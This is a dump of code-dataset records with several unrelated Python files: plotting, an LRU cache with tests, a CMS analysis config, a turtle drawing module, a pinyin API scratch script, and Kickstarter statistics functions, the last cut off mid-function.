acc\")\r\nplt.plot(epochs, val_acc, \"b\", label = \"Validation acc\")\r\nplt.title(\"Training and validation accuracy\")\r\nplt.legend()\r\n\r\nplt.figure()\r\n\r\n# plot loss\r\nplt.plot(epochs, loss, \"bo\", label = \"Training loss\")\r\nplt.plot(epochs, val_loss, \"b\", label = \"Validation loss\")\r\nplt.title(\"Training and validation loss\")\r\nplt.legend()\r\n\r\nplt.show()\r\n\r\nhistory_dict = history.history\r\nhistory_dict.keys()","sub_path":"多クラス分類_多層_crossvalidation.py","file_name":"多クラス分類_多層_crossvalidation.py","file_ext":"py","file_size_in_byte":8006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"236681879","text":"# LRU CACHE\nclass LRU_Cache(object):\n \"\"\"\n Defines an LRU Cache object.\n \"\"\"\n\n def __init__(self, capacity=5):\n # Initialize class variables\n self.data = {}\n self.capacity = capacity\n\n def get(self, key):\n # Retrieve item from provided key. Return -1 if nonexistent.\n try:\n return self.data[key]\n except KeyError:\n return -1\n\n def set(self, key, value):\n 
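# (reviewer note) a plain dict keeps insertion order on Python 3.7+, so the\n # eviction below is FIFO rather than true LRU; a full LRU would also refresh\n # a key's position inside get(), e.g. via collections.OrderedDict.move_to_end().\n 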
# Set the value if the key is not present in the cache. If the cache is\n # at capacity, evict the oldest item first.\n if key in self.data:\n print(\"The key already exists in the LRU Cache!\")\n return\n if self.capacity == len(self.data):\n # evict the oldest inserted key, then store the new entry\n first_key = next(iter(self.data))\n del self.data[first_key]\n self.data[key] = value\n# LRU CACHE\n\n\n# TESTS\n# Udacity Tests\nprint(\"[RUNNING] Running Udacity tests...\\n\")\nour_cache = LRU_Cache(5)\n\nour_cache.set(1, 1)\nour_cache.set(2, 2)\nour_cache.set(3, 3)\nour_cache.set(4, 4)\n\n\nprint(our_cache.get(1)) # returns 1\nprint(our_cache.get(2)) # returns 2\nprint(our_cache.get(9)) # returns -1 because 9 is not present in the cache\n\nassert(our_cache.get(1) == 1)\nassert(our_cache.get(2) == 2)\nassert(our_cache.get(9) == -1)\n\nour_cache.set(5, 5)\nour_cache.set(6, 6)\n\n# returns 3: the cache reached its capacity, but this FIFO eviction removed the oldest key (1), not 3\nprint(our_cache.get(3))\n\nassert(our_cache.get(3) == 3)\n\nprint(\"\\n[PASS] Finished running Udacity tests!\")\n\n# Student Tests\nprint(\"[RUNNING] Running student tests!\\n\")\ncache = LRU_Cache(4)\ncache.set(1, 2)\nprint(cache.get(1))\ncache.set(3, 4)\ncache.set(833, 34)\ncache.set(34, 3)\ncache.set(45, 3)\nprint(cache.get(5)) # returns -1\nprint(cache.get(3)) # returns 4\nprint(cache.get(833)) # returns 34\nprint(cache.get(34)) # returns 3\nprint(cache.get(45)) # returns 3\nprint(cache.get(1)) # returns -1\nprint(\"\\n[PASS] Finished running student tests!\")\n# TESTS\n","sub_path":"LRU_Cache.py","file_name":"LRU_Cache.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"600667751","text":"import FWCore.ParameterSet.Config as cms\n\n## ---\n## use this file to test the GenJetComposition.cc module\n## ---\n\n\n# set sequence shortcut\nprocess = cms.Process(\"Selection\")\n\n## configure message logger\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = 'INFO'\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\n\n## define input\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring( \n ## add your favourite file here\n #'/store/user/henderle/Spring10/WJets_MAD/PATtuple_1.root'\n '/store/user/henderle/Test/PATtuple.root'\n ),\n skipEvents = cms.untracked.uint32(0)\n )\n\n## define maximal number of events to loop over\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\n\n## configure process options\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool(True)\n)\n\n## register TFileService\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('analyzeGenJetComposition_test.root')\n)\n\n## ---\n## load GenJetComposition\n## ---\n\n## get particle content of jets with IDs\nprocess.load(\"TopAnalysis.TopAnalyzer.GenJetComposition_cfi\")\nprocess.analyzeGenJetCompositionAll = process.analyzeGenJetComposition.clone()\n\n## ---\n## run the final sequence\n## ---\n\nprocess.p1 = cms.Path(\n ## apply the analyzer\n process.analyzeGenJetCompositionAll \n )\n","sub_path":"TopAnalyzer/test/analyzeGenJetComposition_cfg.py","file_name":"analyzeGenJetComposition_cfg.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"51107560","text":"\"\"\"A module to draw tkinter-style canvas shapes on a turtle screen.\"\"\"\r\nfrom turtle import *\r\nfrom sys import *\r\nfrom sys import _getframe\r\nfrom os import *\r\n
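# (reviewer note) stacked wildcard imports like these can shadow names across\r\n# modules (e.g. os.open replacing the builtin open), so explicit imports would\r\n# be a safer choice here.\r\n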
t = Pen()\r\nt.hideturtle()\r\nsetup(500, 500)\r\n\r\n\r\nrandom_functions = ['random_polygon', 'random_rectangles', 'one_random_rectangle']\r\ndemo_function = ['demo']\r\nfunctions = ['create_canvas', 'create_line', 'create_rectangle', 'create_triangle',\r\n 'create_text', 'create_circle', 'create_semicircle', 'create_polygon',\r\n random_functions, demo_function]\r\n\r\n\r\nif 'random_rectangles' in random_functions:\r\n tt_version = 3.0\r\nelif 'one_random_rectangle' in random_functions:\r\n tt_version = 2.5\r\nelif random_functions and demo_function in functions:\r\n tt_version = 2.0\r\nelif 'create_polygon' in functions:\r\n tt_version = 1.5\r\nelif 'create_semicircle' in functions:\r\n tt_version = 1.0\r\nelse:\r\n tt_version = 0.5\r\n \r\ndef isWindows64():\r\n return 'PROGRAMFILES(X86)' in environ\r\n\r\ntry:\r\n if isWindows64():\r\n print('TurtleTk %s (Run on python %s:20a20b02a02, Feb 02 2020, 20:20:20) [MSC v%s 64 bit (AMD64)] on win64) ' % (tt_version, version[0:5], tt_version))\r\n else:\r\n print('TurtleTk %s (Run on python %s:20a20b02a02, Feb 02 2020, 20:20:20) [MSC v%s 32 bit (Intel)] on win32) ' % (tt_version, version[0:5], tt_version))\r\nexcept:\r\n print('TurtleTk %s (Run on python %s:20a20b02a02, Feb 02 2020, 20:20:20) [MSC v%s 64 bit (AMD64)] on win64) ' % (tt_version, version[0:5], tt_version))\r\n\r\n \r\n\"\"\"\r\nArgument:\r\n x1/y1/x2/y2/points/... ----- The position of the shape.\r\n width/height ----- The size of the screen.\r\n speed ----- The turtlepen's speed.\r\n thick ----- The turtlepen's width (thickness).\r\n outline ----- The turtlepen's color.\r\n fill ----- The picture's color.\r\n size ----- The text's size.\r\n radius ----- The circle or semicircle's radius.\r\n up ----- The semicircle's direction, left or right (True/False, default False).\r\n many ----- How many random shapes to draw.\r\nExample:\r\n >>> from turtleTk_class import *\r\n >>> c = Create()\r\n >>> c.create_text('HiHello!')\r\n\"\"\"\r\n\r\nclass Create():\r\n def create_canvas(self, width = 500, height = 500, color = 'white'):\r\n setup(width, height)\r\n bgcolor(color)\r\n\r\n def create_line(self, x1, y1, x2, y2, speed = 8, thick = 1, outline = 'black'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.color(outline)\r\n t.penup()\r\n t.setpos(x1, y1)\r\n t.pendown()\r\n t.goto(x2, y2)\r\n t.penup()\r\n done()\r\n\r\n def create_rectangle(self, x1, y1, x2, y2, speed = 8, thick = 1, outline = 'black', fill = 'white'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.penup()\r\n t.setpos(x1, y1)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.begin_fill()\r\n t.color(outline)\r\n t.pendown()\r\n t.goto(x2, y1)\r\n t.goto(x2, y2)\r\n t.goto(x1, y2)\r\n t.goto(x1, y1)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.end_fill()\r\n t.penup()\r\n if _getframe(1).f_code.co_name == '<module>' or _getframe(1).f_code.co_name == 'demo':\r\n done()\r\n\r\n def create_triangle(self, x1, y1, x2, y2, x3, y3, speed = 8, thick = 1, outline = 'black', fill = 'white'):\r\n t.speed(speed)\r\n a = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\r\n b = ((x3 - x2) ** 2 + (y3 - y2) ** 2) ** 0.5\r\n c = ((x3 - x1) ** 2 + (y3 - y1) ** 2) ** 0.5\r\n if (a + b <= c) or (a + c <= b) or (b + c <= a):\r\n raise ValueError('Could not make a triangle!')\r\n t.width(thick)\r\n t.penup()\r\n t.setpos(x1, y1)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.begin_fill()\r\n t.color(outline)\r\n t.pendown()\r\n t.goto(x2, y2)\r\n t.goto(x3, y3)\r\n t.goto(x1, y1)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.end_fill()\r\n t.penup()\r\n done()\r\n\r\n def 
create_text(self, text, x1 = 0, y1 = 0, size = 35):\r\n t.penup()\r\n t.setpos(x1, y1)\r\n t.pendown()\r\n t.write(text, font=(\"华文楷体\", size, \"normal\"))\r\n done()\r\n\r\n def create_circle(self, centerx, centery, radius, speed = 8, thick = 1, outline = 'black', fill = 'white'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.penup()\r\n t.setpos(centerx, centery)\r\n t.left(90)\r\n t.forward(radius)\r\n t.left(90)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.begin_fill()\r\n t.color(outline)\r\n t.pendown()\r\n t.circle(radius)\r\n if fill != 'white':\r\n t.color(fill)\r\n t.end_fill()\r\n t.penup()\r\n t.goto(centerx, centery)\r\n if fill == 'white': \r\n t.pendown()\r\n t.circle(0.5)\r\n t.penup()\r\n done()\r\n\r\n def create_semicircle(self, x1, y1, radius, up = False, speed = 8, thick = 1, outline = 'black'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.penup()\r\n t.setpos(x1, y1)\r\n t.color(outline)\r\n t.right(90)\r\n t.pendown()\r\n if up == True:\r\n t.circle(radius, -180)\r\n else:\r\n t.circle(radius, 180)\r\n t.penup()\r\n done()\r\n\r\n def create_polygon(self, points, speed = 8, thick = 1, outline = 'black', fill = 'white'):\r\n t.speed(speed)\r\n t.width(thick)\r\n t.penup()\r\n if fill != 'white':\r\n t.color(fill)\r\n t.begin_fill()\r\n t.color(outline)\r\n t.pendown()\r\n for x, y in points:\r\n t.goto(x, y)\r\n t.goto(points[0])\r\n if fill != 'white':\r\n t.color(fill)\r\n t.end_fill()\r\n t.penup()\r\n done()\r\n\r\n\r\nclass Random():\r\n def random_rectangles(self, many = 25):\r\n for x in range(0, many):\r\n self.one_random_rectangle()\r\n \r\n def one_random_rectangle(self):\r\n from random import randrange, choice\r\n colors = ['green', 'red', 'blue', 'pink', 'purple', 'violet', 'magenta', 'cyan']\r\n x11 = randrange(-250, 250)\r\n x22 = randrange(-250, 250)\r\n y11 = x11 + randrange(-50, 20)\r\n y22 = x22 + randrange(-50, 20)\r\n color = choice(colors)\r\n c = Create()\r\n c.create_rectangle(x11, y11, x22, y22, fill = color)\r\n\r\n def random_polygon(self, many = 25):\r\n from random import randint\r\n a = []\r\n for q in range(many):\r\n x = randint(-250, 250)\r\n y = randint(-250, 250)\r\n p = (x, y)\r\n a.append(p)\r\n c = Create()\r\n c.create_polygon(a)\r\n\r\ndef demo():\r\n c = Create()\r\n r = Random()\r\n #c.create_canvas(color = 'blue')\r\n #c.create_line(-100, -100, 100, 100)\r\n #c.create_rectangle(-100, -100, 100, 100)\r\n #c.create_triangle(0, 0, 100, 200, 200, 220)\r\n #c.create_triangle(0, 0, 0, 0, 200, 220) #Error\r\n #c.create_text('Hiturtle!')\r\n #c.create_circle(0, 0, 125, thick = 50) #Very THICC\r\n #c.create_circle(0, 0, 75, fill = 'green')\r\n #c.create_semicircle(0, 0, 75)\r\n #c.create_semicircle(0, 0, 75, True)\r\n #c.create_polygon([[0, 0], [0, 100], [100, 100], [100, 0]])\r\n #r.random_rectangles()\r\n #r.one_random_rectangle()\r\n #r.random_polygon()\r\n\r\nif __name__ == '__main__':\r\n demo()\r\n\r\n","sub_path":"module 文件/turtleTk_class.py","file_name":"turtleTk_class.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"479425849","text":"import os\r\nimport sys\r\nimport json\r\n\r\nimport requests\r\n\r\nfrom pprint import pprint\r\n\r\n'''\r\nhttp://olime.baidu.com/py\r\nParameters:\r\n@input = the pinyin string to look up\r\n@inputtype=py writing \"py\" here presumably means pinyin\r\n@bg=0 not clear yet what this does\r\n@ed=20 not clear yet what this does\r\n@result=hanzi not clear yet what this does\r\n@resultcoding=utf-8 character encoding; utf-8 and Unicode have both worked so far\r\n@ch_en=0 not clear yet what this does; possibly related to English candidate suggestions\r\n@clientinfo=web has to be web; other clients probably exist for desktop\r\n@version=1 
have not tried other values\r\n\r\n\r\n\r\n\r\nTemplate:\r\n{\r\n \"status\": \"T\",\r\n \"errno\": \"0\",\r\n \"errmsg\": \"\",\r\n \"result\": [[[\"candidate word\", number of characters consumed, {\r\n \"pinyin\": \"matching pinyin\",\r\n \"type\": \"source\"\r\n }]\r\n \"pinyin word segmentation\"]\r\n}\r\n\r\n'''\r\n\r\n\r\ndef main():\r\n # data = {\r\n # \"input\": \"xingqu\",\r\n # \"inputtype\": \"py\",\r\n # \"bg\": 0,\r\n # \"ed\": 20,\r\n # \"result\": \"hanzi\",\r\n # \"resultcoding\": \"utf-8\",\r\n # \"ch_en\": 0,\r\n # \"clientinfo\": \"web\",\r\n # \"version\": 1,\r\n #\r\n # }\r\n #\r\n #\r\n # # url=\"http://olime.baidu.com/py\"\r\n # url=\"http://olime.baidu.com/py?py=bit&rn=0&pn=5\"\r\n # ret=requests.post(url,data=data)\r\n #\r\n # print(ret.text)\r\n #\r\n # content=ret.text\r\n #\r\n # obj=json.loads(content)\r\n #\r\n #\r\n # pprint(obj)\r\n\r\n\r\n def get_same_piece_pair(src_pieces, mod_pieces, step_threshold=100):\r\n pair = []\r\n m = set()\r\n n = set()\r\n for i in range(len(src_pieces)):\r\n src = src_pieces[i]\r\n step = 0\r\n for j in range(max(0, i - 20), len(mod_pieces), 1):\r\n mod = mod_pieces[j]\r\n step += 1\r\n if src != mod or step > step_threshold:\r\n continue\r\n else:\r\n pair.append(((i, j), (src, mod)))\r\n m.add(i)\r\n n.add(j)\r\n break\r\n # print(pair)\r\n return pair, m, n\r\n\r\n a = ['▁一审法院认定事实', ':', '原', '、', '被告于', '2018', '年', '4', '月', '20', '日经', '财务', '对', '帐', '单', '作出', '的大', '连',\r\n '荣华', '彩', '印', '包装', '有限公司', '财务', '帐', '目', '对账单', ',', '被告', '对该', '对账单', '真实性', '、', '合法性', '、', '关联性',\r\n '均', '没有异议', '。']\r\n b = ['▁一', '申', '法院', '认定', '似', '实', ':', '原', '、', '被告于', '2018', '年', '4', '月', '20', '日经', '材', '务', '对', '帐',\r\n '单', '作出', '的大', '连', '荣华', '彩', '印', '包装', '有限公司', '财务', '帐', '目', '对账单', ',', '被告', '对该', '对', '单', '真实性',\r\n '、', '合法性', '、', '关联性', '均', '没有异议', '。']\r\n print(len(a), len(b))\r\n\r\n print(a[-5],b[41],a[-5]==b[41])\r\n\r\n cc, m, n = get_same_piece_pair(b, a)\r\n\r\n print(sorted(set(list([i for i in range(len(a))])) - m))\r\n print(sorted(set(list([i for i in range(len(b))])) - n))\r\n\r\n for c in cc:\r\n print(c)\r\n\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n pass\r\n","sub_path":"test_for_miao.py","file_name":"test_for_miao.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"337510842","text":"from modules import search\r\nfrom datetime import datetime\r\n\r\ndef getCountryStats(projectList):\r\n\r\n 
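# (reviewer note) the per-country tallies below could be collapsed into\r\n # collections.Counter(p['country'] for p in projectList); the explicit dict is\r\n # kept so every expected ISO 3166-1 code appears in the output, even at zero.\r\n 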
countryStats = {\r\n \"AU\": 0,\r\n \"BE\": 0,\r\n \"CA\": 0,\r\n \"CH\": 0,\r\n \"DE\": 0,\r\n \"DK\": 0,\r\n \"ES\": 0,\r\n \"FR\": 0,\r\n \"GB\": 0,\r\n \"HK\": 0,\r\n \"IE\": 0,\r\n \"IT\": 0,\r\n \"JP\": 0,\r\n \"LU\": 0,\r\n \"MX\": 0,\r\n \"NL\": 0,\r\n \"NO\": 0,\r\n \"NZ\": 0,\r\n \"SE\": 0,\r\n \"SG\": 0,\r\n \"UNK\": 0,\r\n \"US\": 0\r\n }\r\n\r\n for project in projectList:\r\n #Australia\r\n if project['country'] == \"AU\":\r\n countryStats[\"AU\"] += 1\r\n #Belgium\r\n elif project['country'] == \"BE\":\r\n countryStats[\"BE\"] += 1\r\n #Canada\r\n elif project['country'] == \"CA\":\r\n countryStats[\"CA\"] += 1\r\n #Switzerland\r\n elif project['country'] == \"CH\":\r\n countryStats[\"CH\"] += 1\r\n #Germany\r\n elif project['country'] == \"DE\":\r\n countryStats[\"DE\"] += 1\r\n #Denmark\r\n elif project['country'] == \"DK\":\r\n countryStats[\"DK\"] += 1\r\n #Spain\r\n elif project['country'] == \"ES\":\r\n countryStats[\"ES\"] += 1\r\n #France\r\n elif project['country'] == \"FR\":\r\n countryStats[\"FR\"] += 1\r\n #Great Britain\r\n elif project['country'] == \"GB\":\r\n countryStats[\"GB\"] += 1\r\n #Hong Kong\r\n elif project['country'] == \"HK\":\r\n countryStats[\"HK\"] += 1\r\n #Ireland\r\n elif project['country'] == \"IE\":\r\n countryStats[\"IE\"] += 1\r\n #Italy\r\n elif project['country'] == \"IT\":\r\n countryStats[\"IT\"] += 1\r\n #Japan\r\n elif project['country'] == \"JP\":\r\n countryStats[\"JP\"] += 1\r\n #Luxembourg\r\n elif project['country'] == \"LU\":\r\n countryStats[\"LU\"] += 1\r\n #Mexico\r\n elif project['country'] == \"MX\":\r\n countryStats[\"MX\"] += 1\r\n #Netherlands\r\n elif project['country'] == \"NL\":\r\n countryStats[\"NL\"] += 1\r\n #Norway\r\n elif project['country'] == \"NO\":\r\n countryStats[\"NO\"] += 1\r\n #New Zealand\r\n elif project['country'] == \"NZ\":\r\n countryStats[\"NZ\"] += 1\r\n #Sweden\r\n elif project['country'] == \"SE\":\r\n countryStats[\"SE\"] += 1\r\n #Singapore\r\n elif project['country'] == \"SG\":\r\n countryStats[\"SG\"] += 1\r\n #Unknown\r\n elif project['country'] == \"UNK\":\r\n countryStats[\"UNK\"] += 1\r\n #United States\r\n elif project['country'] == \"US\":\r\n countryStats[\"US\"] += 1\r\n return countryStats\r\n\r\ndef getCategoryStats(projectList):\r\n\r\n categoryStats = {\r\n \"Comics\": 0,\r\n \"Crafts\": 0,\r\n \"Dance\": 0,\r\n \"Fashion\": 0,\r\n #Ampersand (&) is weird on graph so we manually spell it out\r\n \"Film and Video\": 0,\r\n \"Food\": 0,\r\n \"Journalism\": 0,\r\n \"Games\": 0,\r\n \"Music\": 0,\r\n \"Photography\": 0,\r\n \"Publishing\": 0,\r\n \"Technology\": 0,\r\n \"Theater\": 0\r\n }\r\n \r\n for project in projectList:\r\n if project['main_category'] == \"Comics\":\r\n categoryStats[\"Comics\"] += 1\r\n\r\n elif project['main_category'] == \"Crafts\":\r\n categoryStats[\"Crafts\"] += 1\r\n\r\n elif project['main_category'] == \"Dance\":\r\n categoryStats[\"Dance\"] += 1\r\n\r\n elif project['main_category'] == \"Fashion\":\r\n categoryStats[\"Fashion\"] += 1\r\n\r\n elif project['main_category'] == \"Film & Video\":\r\n categoryStats[\"Film and Video\"] += 1\r\n\r\n elif project['main_category'] == \"Food\":\r\n categoryStats[\"Food\"] += 1\r\n\r\n elif project['main_category'] == \"Journalism\":\r\n categoryStats[\"Journalism\"] += 1\r\n\r\n elif project['main_category'] == \"Games\":\r\n categoryStats[\"Games\"] += 1\r\n\r\n elif project['main_category'] == \"Music\":\r\n categoryStats[\"Music\"] += 1\r\n\r\n elif project['main_category'] == \"Photography\":\r\n categoryStats[\"Photography\"] += 1\r\n\r\n elif project['main_category'] == \"Publishing\":\r\n 
categoryStats[\"Publishing\"] += 1\r\n\r\n elif project['main_category'] == \"Technology\":\r\n categoryStats[\"Technology\"] += 1\r\n \r\n elif project['main_category'] == \"Theater\":\r\n categoryStats[\"Theater\"] += 1 \r\n\r\n return categoryStats\r\n\r\ndef getFailedTakeoffStats(projectList):\r\n zeroBackersList = (search.search(\"0\", \"backers\", projectList))\r\n\r\n failedTakeoffStats = {\r\n \"Comics\": 0,\r\n \"Crafts\": 0,\r\n \"Dance\": 0,\r\n \"Fashion\": 0,\r\n #Amperstand (&) is weird on graph so we manually spell it out\r\n \"Film and Video\": 0,\r\n \"Food\": 0,\r\n \"Journalism\": 0,\r\n \"Games\": 0,\r\n \"Music\": 0,\r\n \"Photography\": 0,\r\n \"Publishing\": 0,\r\n \"Technology\": 0,\r\n \"Theater\": 0\r\n }\r\n \r\n for project in zeroBackersList:\r\n if project['main_category'] == \"Comics\":\r\n failedTakeoffStats[\"Comics\"] += 1\r\n\r\n elif project['main_category'] == \"Crafts\":\r\n failedTakeoffStats[\"Crafts\"] += 1\r\n\r\n elif project['main_category'] == \"Dance\":\r\n failedTakeoffStats[\"Dance\"] += 1\r\n\r\n elif project['main_category'] == \"Fashion\":\r\n failedTakeoffStats[\"Fashion\"] += 1\r\n\r\n elif project['main_category'] == \"Film & Video\":\r\n failedTakeoffStats[\"Film and Video\"] += 1\r\n\r\n elif project['main_category'] == \"Food\":\r\n failedTakeoffStats[\"Food\"] += 1\r\n\r\n elif project['main_category'] == \"Journalism\":\r\n failedTakeoffStats[\"Journalism\"] += 1\r\n\r\n elif project['main_category'] == \"Games\":\r\n failedTakeoffStats[\"Games\"] += 1\r\n\r\n elif project['main_category'] == \"Music\":\r\n failedTakeoffStats[\"Music\"] += 1\r\n\r\n elif project['main_category'] == \"Photography\":\r\n failedTakeoffStats[\"Photography\"] += 1\r\n\r\n elif project['main_category'] == \"Publishing\":\r\n failedTakeoffStats[\"Publishing\"] += 1\r\n\r\n elif project['main_category'] == \"Technology\":\r\n failedTakeoffStats[\"Technology\"] += 1\r\n\r\n elif project['main_category'] == \"Theater\":\r\n failedTakeoffStats[\"Theater\"] += 1 \r\n\r\n return failedTakeoffStats\r\n\r\ndef getMostSuccessfulCategoryStats(projectList):\r\n successfulStateList = (search.search(\"successful\", \"state\", projectList))\r\n\r\n mostSuccessfulStats = {\r\n \"Comics\": 0,\r\n \"Crafts\": 0,\r\n \"Dance\": 0,\r\n \"Fashion\": 0,\r\n #Amperstand (&) is weird on graph so we manually spell it out\r\n \"Film and Video\": 0,\r\n \"Food\": 0,\r\n \"Journalism\": 0,\r\n \"Games\": 0,\r\n \"Music\": 0,\r\n \"Photography\": 0,\r\n \"Publishing\": 0,\r\n \"Technology\": 0,\r\n \"Theater\": 0\r\n }\r\n \r\n for project in successfulStateList:\r\n if project['main_category'] == \"Comics\":\r\n mostSuccessfulStats[\"Comics\"] += 1\r\n\r\n elif project['main_category'] == \"Crafts\":\r\n mostSuccessfulStats[\"Crafts\"] += 1\r\n\r\n elif project['main_category'] == \"Dance\":\r\n mostSuccessfulStats[\"Dance\"] += 1\r\n\r\n elif project['main_category'] == \"Fashion\":\r\n mostSuccessfulStats[\"Fashion\"] += 1\r\n\r\n elif project['main_category'] == \"Film & Video\":\r\n mostSuccessfulStats[\"Film and Video\"] += 1\r\n\r\n elif project['main_category'] == \"Food\":\r\n mostSuccessfulStats[\"Food\"] += 1\r\n\r\n elif project['main_category'] == \"Journalism\":\r\n mostSuccessfulStats[\"Journalism\"] += 1\r\n\r\n elif project['main_category'] == \"Games\":\r\n mostSuccessfulStats[\"Games\"] += 1\r\n\r\n elif project['main_category'] == \"Music\":\r\n mostSuccessfulStats[\"Music\"] += 1\r\n\r\n elif project['main_category'] == \"Photography\":\r\n 
mostSuccessfulStats[\"Photography\"] += 1\r\n\r\n elif project['main_category'] == \"Publishing\":\r\n mostSuccessfulStats[\"Publishing\"] += 1\r\n\r\n elif project['main_category'] == \"Technology\":\r\n mostSuccessfulStats[\"Technology\"] += 1\r\n\r\n elif project['main_category'] == \"Theater\":\r\n mostSuccessfulStats[\"Theater\"] += 1 \r\n\r\n #We have the stats on successful projects from each category, now we need the total number of projects from each category to divide and get percentages\r\n categoryStats = getCategoryStats(projectList) \r\n mostSuccessfulStats[\"Comics\"] = round((mostSuccessfulStats[\"Comics\"]/categoryStats[\"Comics\"] * 100), 2)\r\n mostSuccessfulStats[\"Crafts\"] = round((mostSuccessfulStats[\"Crafts\"]/categoryStats[\"Crafts\"] * 100), 2)\r\n mostSuccessfulStats[\"Dance\"] = round((mostSuccessfulStats[\"Dance\"]/categoryStats[\"Dance\"] * 100), 2)\r\n mostSuccessfulStats[\"Fashion\"] = round((mostSuccessfulStats[\"Fashion\"]/categoryStats[\"Fashion\"] * 100), 2)\r\n mostSuccessfulStats[\"Film and Video\"] = round((mostSuccessfulStats[\"Film and Video\"]/categoryStats[\"Film and Video\"] * 100), 2)\r\n mostSuccessfulStats[\"Food\"] = round((mostSuccessfulStats[\"Food\"]/categoryStats[\"Food\"] * 100), 2)\r\n mostSuccessfulStats[\"Journalism\"] = round((mostSuccessfulStats[\"Journalism\"]/categoryStats[\"Journalism\"] * 100), 2)\r\n mostSuccessfulStats[\"Games\"] = round((mostSuccessfulStats[\"Games\"]/categoryStats[\"Games\"] * 100), 2)\r\n mostSuccessfulStats[\"Music\"] = round((mostSuccessfulStats[\"Music\"]/categoryStats[\"Music\"] * 100), 2)\r\n mostSuccessfulStats[\"Photography\"] = round((mostSuccessfulStats[\"Photography\"]/categoryStats[\"Photography\"] * 100), 2)\r\n mostSuccessfulStats[\"Publishing\"] = round((mostSuccessfulStats[\"Publishing\"]/categoryStats[\"Publishing\"] * 100), 2)\r\n mostSuccessfulStats[\"Technology\"] = round((mostSuccessfulStats[\"Technology\"]/categoryStats[\"Technology\"] * 100), 2)\r\n mostSuccessfulStats[\"Theater\"] = round((mostSuccessfulStats[\"Theater\"]/categoryStats[\"Theater\"] * 100), 2) \r\n\r\n return mostSuccessfulStats\r\n\r\ndef getSuccessPercentageStats(projectList):\r\n successfulStateList = (search.search(\"successful\", \"state\", projectList))\r\n mostSuccessfulStats = {\r\n \"Total Success\": 0,\r\n \r\n #Amperstand (&) is weird on graph so we manually spell it out\r\n }\r\n \r\n for project in successfulStateList:\r\n mostSuccessfulStats[\"Total Success\"] += 1\r\n \r\n totalProj= 0\r\n \r\n for project in projectList:\r\n totalProj +=1\r\n categoryStats = getCategoryStats(projectList) \r\n mostSuccessfulStats[\"Total Success\"] = round((mostSuccessfulStats[\"Total Success\"]/totalProj* 100), 2)\r\n \r\n return mostSuccessfulStats\r\n\r\ndef getFundingVersusSuccessStats(projectList):\r\n\r\n #Count all of the successes and failures in each bracket, so we can divide them and get percentages afterward. 
rawFundingVersusSuccessStats = {\r\n \"0-100 Success\": 0,\r\n \"0-100 Failed\": 0,\r\n \"101-1,000 Success\": 0,\r\n \"101-1,000 Failed\": 0,\r\n \"1,001-10,000 Success\": 0,\r\n \"1,001-10,000 Failed\": 0,\r\n \"10,001-100,000 Success\": 0,\r\n \"10,001-100,000 Failed\": 0,\r\n \"100,001-1,000,000 Success\": 0,\r\n \"100,001-1,000,000 Failed\": 0,\r\n \"1,000,001+ Success\": 0,\r\n \"1,000,001+ Failed\": 0\r\n }\r\n\r\n for project in projectList:\r\n if project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) <= 100:\r\n rawFundingVersusSuccessStats[\"0-100 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) <= 100:\r\n rawFundingVersusSuccessStats[\"0-100 Failed\"] += 1\r\n\r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 100 and float(project[\"usd_goal_real\"]) <= 1000:\r\n rawFundingVersusSuccessStats[\"101-1,000 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 100 and float(project[\"usd_goal_real\"]) <= 1000:\r\n rawFundingVersusSuccessStats[\"101-1,000 Failed\"] += 1\r\n \r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 1000 and float(project[\"usd_goal_real\"]) <= 10000:\r\n rawFundingVersusSuccessStats[\"1,001-10,000 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 1000 and float(project[\"usd_goal_real\"]) <= 10000:\r\n rawFundingVersusSuccessStats[\"1,001-10,000 Failed\"] += 1\r\n \r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 10000 and float(project[\"usd_goal_real\"]) <= 100000:\r\n rawFundingVersusSuccessStats[\"10,001-100,000 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 10000 and float(project[\"usd_goal_real\"]) <= 100000:\r\n rawFundingVersusSuccessStats[\"10,001-100,000 Failed\"] += 1\r\n\r\n elif project[\"state\"] == \"successful\" and float(project[\"usd_goal_real\"]) > 100000 and float(project[\"usd_goal_real\"]) <= 1000000:\r\n rawFundingVersusSuccessStats[\"100,001-1,000,000 Success\"] += 1\r\n elif project[\"state\"] == \"failed\" and float(project[\"usd_goal_real\"]) > 100000 and float(project[\"usd_goal_real\"]) <= 1000000:\r\n rawFundingVersusSuccessStats[\"100,001-1,000,000 